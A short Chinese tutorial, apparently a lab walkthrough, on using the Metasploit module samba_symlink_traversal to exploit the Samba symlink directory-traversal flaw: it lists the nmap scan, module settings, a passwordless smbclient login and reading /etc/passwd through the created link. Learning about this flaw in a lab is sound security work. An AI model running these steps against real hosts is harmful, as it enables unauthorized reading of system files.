Metasploit溢出sysmlink默认配置目录遍历漏洞
2017-12-18 本文已影响0人
Killshadow
目的
利用sysmlink漏洞读取目标主机的passwd文件内容。
原理
Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,Samba的Sambd默认配置在可写文件共享时,存在目录便利漏洞,远程用户可以通过smbclient端使用一个对称命令,创建一个包含..的目录遍历符的软连接,可以进行目录遍历以及访问任意文件.
环境
攻击环境步骤
一、利用nmap工具扫描目标主机
- 命令
nmap -sV 192.168.1.3
,对目标主机进行端口扫描,发现开放445端口、139端口并且安装Samba软件,版本为3. - 在终端中输入命令
msfconsole
,启动MSF终端。 - 在终端中输入命令
search samba
,搜索Samba的相关工具和攻击载荷。 - 在终端中输入命令
use auxiliary/admin/smb/samba_symlink_traversal
,启用漏洞利用模块,提示符就会提示进入到该路径下。 - 在终端输入命令
info
,查看需要设置的相关项,yes
表示必须填写的参数。 - 在终端中输入命令
set RHOST 192.168.1.3
,设置目标主机的IP地址。 - 在终端中输入
set SMBSHARE tmp
,设置SAM可写文件。 - 在终端中输入
exploit
,开始攻击。 - 新打开一个终端,输入
smbclient //192.168.1.3/tmp
,直接回车,不用输入密码。 - 在终端中输入
cd rootfs
,进入rootfs目录,在终端下输入命令ls
,列出目录。 -
more /etc/passwd
getshell